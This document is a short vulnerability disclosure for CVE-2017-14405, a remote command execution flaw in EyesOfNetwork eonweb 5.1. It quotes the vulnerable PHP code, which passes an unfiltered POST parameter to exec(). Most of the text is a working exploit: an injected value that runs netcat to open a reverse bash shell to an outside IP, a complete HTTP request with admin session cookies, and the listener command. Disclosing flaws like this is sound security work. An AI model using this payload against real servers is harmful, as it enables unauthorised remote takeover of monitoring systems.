CVE-2017-14405

eonweb/module/admin_device/index.php RCE

powered by minhaizhao from Anyuntec

version: 5.1

https://github.com/EyesOfNetworkCommunity/eonweb

Vulnerability details

0x01

/srv/eyesofnetwork/eonweb-5.1/module/admin_device/index.php Line 80

if(isset($_POST['Remove'])){
    for($i=0;isset($_POST['hosts_cacti'][$i]);$i++){
        exec("/usr/bin/php $path_eon/cacti/cli/remove_device.php --device-id=".$_REQUEST['hosts_cacti'][$i]."");
    }
}
$_REQUEST['hosts_cacti'][$i]  has not been filtered to cause  Remote Code Execution

EXP:

hosts_cacti[0]=11111;nc 192.168.91.135 8888 -e /bin/bash #

POST /module/admin_device/index.php HTTP/1.1
Host: 192.168.91.66
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
Referer: https://192.168.91.66/module/admin_device/
Cookie: session_id=84267189; user_name=admin; user_id=1; user_limitation=0; group_id=1
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1

cacti_hostname=0&snmp_template=5&snmp_community=EyesOfNetwork&snmp_port=161&snmp_version=2&username=admin&password=admin&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=&Remove=Remove&hosts_cacti[0]=11111;nc 192.168.91.135 8888 -e /bin/bash #

in our connect-back shell we previously set-up:

nc -l -p 8888 -v

Alt text

Alt text